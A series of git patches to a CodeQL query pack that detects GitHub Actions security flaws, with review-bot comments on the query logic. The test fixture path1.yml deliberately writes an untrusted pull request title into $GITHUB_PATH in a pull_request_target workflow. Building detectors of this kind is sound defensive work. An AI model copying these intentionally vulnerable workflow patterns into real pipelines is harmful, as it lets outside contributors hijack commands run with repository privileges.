'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index 27f6bbca39c..4913ed2d100 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected 
@@ -18,8 +18,10 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 1a44d83ddbe4c1868884ac0c4b59c6ba79313851 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 17:58:40 +0200 Subject: [PATCH 0205/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 64e2861cf68..64f57746a88 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.11 +version: 0.0.12 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c769ea06d0b..c796ff5ee40 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.11 +version: 0.0.12 groups: - actions - queries From 46d2bb24e52c2031ed0b95bcb90bd6e15177e2e4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 20 Apr 2024 22:57:22 +0200 Subject: [PATCH 0206/1267] Fix expression always true query --- ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql | 1 + ql/src/qlpack.yml | 2 +- 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 64f57746a88..4364e979f91 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.12 +version: 0.0.13 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql index 0a951cbabe1..b631b5f17b3 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql @@ -15,6 +15,7 @@ import actions from If i where + i.getCondition().matches("%${{%") and i.getConditionStyle() = ["|", ">"] or i.getCondition().matches("%${{%") and diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c796ff5ee40..6259340a4a6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.12 +version: 0.0.13 groups: - actions - queries 
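Review bot: The guard `i.getCondition().matches("%${{%")` now appears once per disjunct in the `where` clause of `ExpressionIsAlwaysTrue.ql`, and how the clause groups depends on `and` binding tighter than `or`. Writing the guard once and putting the alternatives in parentheses, in the form `i.getCondition().matches("%${{%") and ( i.getConditionStyle() = ["|", ">"] or ... )`, makes the intended grouping explicit. The clause continues past the end of the hunk, so the remaining disjuncts are not visible here. The commit's diffstat lists only the query and two `qlpack.yml` files, so this change in detection behaviour arrives without a fixture or `.expected` update.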
From 9183fb0d808ca243a32634fbbc3a206342e5487d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 20 Apr 2024 23:31:08 +0200 Subject: [PATCH 0207/1267] Fix expression always true query --- ql/lib/qlpack.yml | 2 +- .../CWE-571/ExpressionIsAlwaysTrue.ql | 10 +++--- ql/src/qlpack.yml | 2 +- .../CWE-571/.github/workflows/test.yml | 35 +++++++++++++++++-- .../CWE-571/ExpressionIsAlwaysTrue.expected | 7 ++++ 5 files changed, 47 insertions(+), 9 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4364e979f91..b557a60a751 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.13 +version: 0.0.14 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql index b631b5f17b3..58eab4c6022 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql @@ -1,4 +1,6 @@ /** + *: + * * @name If expression always true * @description Expressions used in If conditions with extra spaces are always true. * @kind problem @@ -16,10 +18,10 @@ import actions from If i where i.getCondition().matches("%${{%") and - i.getConditionStyle() = ["|", ">"] - or - i.getCondition().matches("%${{%") and - not i.getCondition().matches("${{%") + ( + not i.getCondition().matches("${{%") or + not i.getCondition().matches("%}}") + ) or count(i.getCondition().splitAt("${{")) > 2 select i, "Expression always evaluates to true" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6259340a4a6..99ecbe14d55 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.13 +version: 0.0.14 groups: - actions - queries 
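Review bot: The two lines added above `@name` in the QLDoc header of `ExpressionIsAlwaysTrue.ql`, ` *:` and an empty ` *`, look like an accidental edit. Neither carries a metadata tag, and the first leaves a stray `:` at the top of the query's header comment. Dropping both lets the header start at ` * @name If expression always true` again.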
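Review bot: The rewritten condition no longer consults `getConditionStyle()`, and nothing in the query explains why `not i.getCondition().matches("%}}")` is enough to cover block scalars. Judging by the new fixtures and `ExpressionIsAlwaysTrue.expected`, `|`, `>`, `|+` and `>+` are reported while `>-` and `|-` are not, which suggests the check relies on `getCondition()` keeping the scalar's trailing newline; that is inferred from the test output, not shown in the hunk. A comment above the parenthesised group, such as `// any text before "${{" or after "}}" (including the newline a block scalar keeps) makes the condition a non-empty string`, would record the reasoning. Wrapping the first `and` group in parentheses before the `or count(...)` disjunct would also make the grouping explicit.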
diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml index 16b725b5ee8..30c4dcab932 100644 --- a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml @@ -8,7 +8,7 @@ jobs: process-pr: runs-on: ubuntu-latest steps: - - name: Test1 + - name: Test 1 if: 1 == 2 run: echo "Test 1 should not be printed" - name: Test 2 @@ -36,8 +36,8 @@ jobs: - name: Test 7 run: echo "Test 7 should not be printed" if: ${{ - 1 == 2 || - 3 == 4 + github.actor == 'torvalds' || + github.actor == 'dependabot[bot]' }} - name: Test 8 @@ -58,3 +58,32 @@ jobs: - name: Test 12 if: " ${{ 1 == 2 }}" run: echo "Test 12 should not be printed" + - name: Test 13 + if: | + 1 == 2 || + 3 == 4 + run: echo "Test 13 should not be printed" + - name: Test 14 + if: >- + ${{( + false || 1 == 2 + )}} + run: echo "Test 14 should not be printed" + - name: Test 15 + if: |- + ${{( + false || 1 == 2 + )}} + run: echo "Test 15 should not be printed" + - name: Test 16 + if: |+ + ${{( + false || 1 == 2 + )}} + run: echo "Test 16 should not be printed" + - name: Test 17 + if: >+ + ${{( + false || 1 == 2 + )}} + run: echo "Test 17 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected new file mode 100644 index 00000000000..a8f068c9cd8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected 
@@ -0,0 +1,7 @@ +| .github/workflows/test.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true | +| .github/workflows/test.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test.yml:85:13:88:14 | >+ | Expression always evaluates to true | From ab7196ac5249f1acf711449d8874235fe4d4897b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 09:53:30 +0200 Subject: [PATCH 0208/1267] Fix FPs in EnvVarInjection --- .../actions/security/EnvVarInjectionQuery.qll | 18 ------------------ .../Security/CWE-077/EnvVarInjection.expected | 12 ------------ .../CWE-077/PrivilegedEnvVarInjection.expected | 16 ---------------- 3 files changed, 46 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index af155e9f3d7..7d95188cc8c 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
@@ -24,28 +24,10 @@ predicate envVarInjectionFromFileSink(DataFlow::Node sink) { ) } -/** - * Holds if a Run step declares an environment variable, uses it to declare a new env var. - * e.g. - * env: - * BODY: ${{ github.event.comment.body }} - * run: | - * echo "foo=$(echo $BODY)" >> $GITHUB_ENV - */ -predicate envVarInjectionFromEnvSink(DataFlow::Node sink) { - exists(Run run, Expression expr, string varName, string value | - sink.asExpr().getInScopeEnvVarExpr(varName) = expr and - run = sink.asExpr() and - Utils::writeToGitHubEnv(run, _, value) and - value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 - ) -} - private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { envVarInjectionFromExprSink(this) or envVarInjectionFromFileSink(this) or - envVarInjectionFromEnvSink(this) or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 31a550e3756..0c4574a77cb 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected 
@@ -3,10 +3,6 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | 
@@ -16,13 +12,5 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 527808d10b0..6dbe7bf3c93 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected 
@@ -3,10 +3,6 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | 
@@ -16,14 +12,6 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | 
@@ -31,7 +19,3 @@ subpaths | .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | -| .github/workflows/test4.yml:21:9:25:6 | Run Step | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:21:9:25:6 | Run Step | Run Step | -| .github/workflows/test4.yml:25:9:31:6 | Run Step | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:25:9:31:6 | Run Step | Run Step | -| .github/workflows/test4.yml:31:9:37:6 | Run Step | .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:31:9:37:6 | Run Step | Run Step | -| .github/workflows/test4.yml:37:9:45:6 | Run Step | .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:37:9:45:6 | Run Step | Run Step | From c31e9dde5e49faa2ab3561a5a13fae573a6bd58e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 16:19:56 +0200 Subject: [PATCH 0209/1267] Add EnvPathInjection query --- ql/lib/codeql/actions/Ast.qll | 22 ++++++ .../security/EnvPathInjectionQuery.qll | 68 +++++++++++++++++++ .../actions/security/EnvVarInjectionQuery.qll | 2 +- ql/src/Security/CWE-077/EnvPathInjection.ql | 32 +++++++++ .../CWE-077/PrivilegedEnvPathInjection.ql | 28 ++++++++ .../CWE-077/.github/workflows/path1.yml | 33 +++++++++ .../Security/CWE-077/EnvPathInjection.actual | 10 +++ .../Security/CWE-077/EnvPathInjection.qlref | 1 + 8 files changed, 195 insertions(+), 1 deletion(-) create mode 100644 ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll create mode 100644 ql/src/Security/CWE-077/EnvPathInjection.ql create mode 100644 ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8a3dfb7b2a7..ac222741c02 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -89,6 +89,24 @@ module Utils { ) } + bindingset[line] + predicate extractPathAssignment(string line, string value) { + exists(string path | + // single path assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", + 2) and + value = trimQuotes(path) + or + // workflow command assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) + .regexpReplaceAll("^\"", "") + .regexpReplaceAll("\"$", "") and + value = trimQuotes(path) + ) + } + predicate writeToGitHubEnv(Run run, string key, string value) { extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or extractMultilineAssignment(run.getScript(), "ENV", key, value) @@ -98,6 +116,10 @@ module Utils { extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) } + + predicate writeToGitHubPath(Run run, string value) { + extractPathAssignment(run.getScript().splitAt("\n"), value) + } } class AstNode instanceof AstNodeImpl { diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll new file mode 100644 index 00000000000..a5cf2d600f0 --- /dev/null +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll 
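Review bot: `extractPathAssignment` accepts `Write-Output` as the command but only recognises the redirect target as `$GITHUB_PATH` or `${GITHUB_PATH}`, so a PowerShell step that appends to `$env:GITHUB_PATH` is not matched and the new PATH-injection sinks never see it. Widening the optional group to `\\$(\\{|env:)?GITHUB_PATH(\\})?` leaves capture group 2 unchanged and covers that form. If `regexpCapture` has to match the whole receiver, which I believe it does, an indented `echo ... >> $GITHUB_PATH` inside a multi-line script is missed as well; calling it on `line.trim()` would avoid that. In the `::add-path::` branch the greedy `(.*)` already consumes the closing quote, so the trailing `(\"|')?` never matches and the quote stripping is really done by the two `regexpReplaceAll` calls and `trimQuotes`.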
@@ -0,0 +1,68 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +private import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.DataFlow + +predicate envPathInjectionFromExprSink(DataFlow::Node sink) { + exists(Expression expr, Run run, string value | + Utils::writeToGitHubPath(run, value) and + expr = sink.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getExpression()) > 0 + ) +} + +predicate envPathInjectionFromFileSink(DataFlow::Node sink) { + exists(Run run, UntrustedArtifactDownloadStep step, string value | + sink.asExpr() = run and + step.getAFollowingStep() = run and + Utils::writeToGitHubPath(run, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare a PATH env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "$BODY" >> $GITHUB_PATH + */ +predicate envPathInjectionFromEnvSink(DataFlow::Node sink) { + exists(Run run, Expression expr, string varname, string value | + sink.asExpr().getInScopeEnvVarExpr(varname) = expr and + run = sink.asExpr() and + Utils::writeToGitHubPath(run, value) and + ( + value = ["$" + varname, "${" + varname + "}", "$ENV{" + varname + "}"] + or + value.matches("$(echo %") and value.indexOf(varname) > 0 + ) + ) +} + +private class EnvPathInjectionSink extends DataFlow::Node { + EnvPathInjectionSink() { + envPathInjectionFromExprSink(this) or + envPathInjectionFromFileSink(this) or + envPathInjectionFromEnvSink(this) or + externallyDefinedSink(this, "envpath-injection") + } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. 
+ */ +private module EnvPathInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof EnvPathInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate the PATH environment variable. */ +module EnvPathInjectionFlow = TaintTracking::Global; diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 7d95188cc8c..0ae333a56f5 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -10,7 +10,7 @@ predicate envVarInjectionFromExprSink(DataFlow::Node sink) { Utils::writeToGitHubEnv(run, key, value) and expr = sink.asExpr() and run.getAnScriptExpr() = expr and - value.indexOf(expr.getRawExpression()) > 0 + value.indexOf(expr.getExpression()) > 0 ) } diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql new file mode 100644 index 00000000000..19b4cf6c01b --- /dev/null +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql 
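Review bot: `envPathInjectionFromEnvSink` in `EnvPathInjectionQuery.qll` only holds when the written value is exactly `$VAR`, `${VAR}` or `$ENV{VAR}`, or starts with `$(echo `, so a step that embeds the variable in a longer entry such as `"$PATHINJ/bin"` is not reported even though the PATH entry is still externally influenced. A containment test, `value.indexOf(["$" + varname, "${" + varname + "}", "$ENV{" + varname + "}"]) >= 0`, would cover that case; it can also match a longer variable name sharing the prefix, so a fixture for both cases in `path1.yml` would help. The doc comment on `EnvPathInjectionConfig` still says "an environment variable" and should name PATH, as the comment on `EnvPathInjectionFlow` does.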
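Review bot: `value.indexOf(expr.getExpression()) > 0` in `envVarInjectionFromExprSink` discards a match at offset 0, so the result depends on the expression never being the first thing in `value`; `>= 0` states the containment test directly. The same comparison is used in `envPathInjectionFromExprSink` in the new `EnvPathInjectionQuery.qll`. The switch from `getRawExpression()` to `getExpression()` changes what the existing query matches, yet the commit message does not mention it and the diffstat lists no EnvVarInjection `.expected` file, so its effect is unverified in this commit. The predicate starts above the hunk.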
@@ -0,0 +1,32 @@
+/**
+ * @name PATH Enviroment Variable built from user-controlled sources
+ * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 5.0
+ * @precision high
+ * @id actions/envpath-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-077
+ * external/cwe/cwe-020
+ */
+
+import actions
+import codeql.actions.security.EnvPathInjectionQuery
+import EnvPathInjectionFlow::PathGraph
+
+from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink
+where
+ EnvPathInjectionFlow::flowPath(source, sink) and
+ (
+ exists(source.getNode().asExpr().getEnclosingCompositeAction())
+ or
+ exists(Workflow w |
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ not w.isPrivileged()
+ )
+ )
+select sink.getNode(), source, sink,
+ "Potential PATH environment variable injection in $@, which may be controlled by an external user.",
+ sink, sink.getNode().toString()
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql
new file mode 100644
index 00000000000..e9f55d1cbb2
--- /dev/null
+++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql
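Review bot: The `@name` line of `EnvPathInjection.ql` misspells "Environment" as `Enviroment`, and `PrivilegedEnvPathInjection.ql` in the same commit carries the identical `@name` and `@description`, so the two queries cannot be told apart by name in a result list. I would use ` * @name PATH environment variable built from user-controlled sources` here and ` * @name PATH environment variable built from user-controlled sources in a privileged context` in the privileged query. Only the `@id`, severity and alert message distinguish them at the moment.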
@@ -0,0 +1,28 @@
+/**
+ * @name PATH Enviroment Variable built from user-controlled sources
+ * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/privileged-envpath-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-077
+ * external/cwe/cwe-020
+ */
+
+import actions
+import codeql.actions.security.EnvPathInjectionQuery
+import EnvPathInjectionFlow::PathGraph
+
+from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink
+where
+ EnvPathInjectionFlow::flowPath(source, sink) and
+ exists(Workflow w |
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ w.isPrivileged()
+ )
+select sink.getNode(), source, sink,
+ "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.",
+ sink, sink.getNode().toString()
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml
new file mode 100644
index 00000000000..d22f09c03bd
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml
@@ -0,0 +1,33 @@
+name: Pull Request Open
+
+on:
+ pull_request_target:
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+
+ - run: echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH
+ - env:
+ PATHINJ: ${{ github.event.pull_request.title }}
+ run: echo $(echo "$PATHINJ") >> $GITHUB_PATH
+ - env:
+ PATHINJ: ${{ github.event.pull_request.title }}
+ run: echo $PATHINJ >> $GITHUB_PATH
